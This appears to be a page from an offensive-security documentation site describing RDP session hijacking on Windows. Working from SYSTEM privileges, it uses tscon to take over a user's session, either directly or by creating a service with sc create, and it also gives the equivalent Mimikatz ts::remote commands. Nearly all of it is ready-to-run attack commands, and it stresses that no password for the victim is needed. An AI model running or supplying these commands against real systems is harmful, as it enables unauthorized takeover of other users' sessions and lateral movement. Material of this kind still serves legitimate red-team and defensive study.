Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

As SYSTEM, hijack active or disconnected RDP sessions without knowing the user’s password. Uses tscon to switch sessions.

List Sessions

query user
qwinsta
Output shows session IDs and state (Active/Disc).

Hijack — From SYSTEM

Get SYSTEM First

PsExec.exe -s cmd.exe
Or via service: 
sc create sesshijack binpath= "cmd.exe /k tscon TARGET_SESSION_ID /dest:rdp-tcp#CURRENT_SESSION"
sc start sesshijack

Switch Session

tscon TARGET_SESSION_ID /dest:rdp-tcp#YOUR_SESSION_ID

Example

# You are in session 2, want to hijack session 1
tscon 1 /dest:rdp-tcp#2

Via Service (No Interactive SYSTEM)

sc create hijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#2"
net start hijack

Mimikatz Method

mimikatz # ts::sessions          # List sessions
mimikatz # token::elevate        # Get SYSTEM
mimikatz # ts::remote /id:1      # Hijack session 1

Notes

  • Requires SYSTEM privileges
  • Works on disconnected sessions too
  • No password needed for target session
  • User doesn’t get disconnected (attacker joins their session)
  • Server 2019+ may require additional steps

Quick Reference

TaskCommand
List sessionsquery user or qwinsta
Hijacktscon SESSION_ID /dest:rdp-tcp#YOUR_SESSION
Via servicesc create hijack binpath= "cmd /k tscon ..."
Mimikatzts::remote /id:SESSION_ID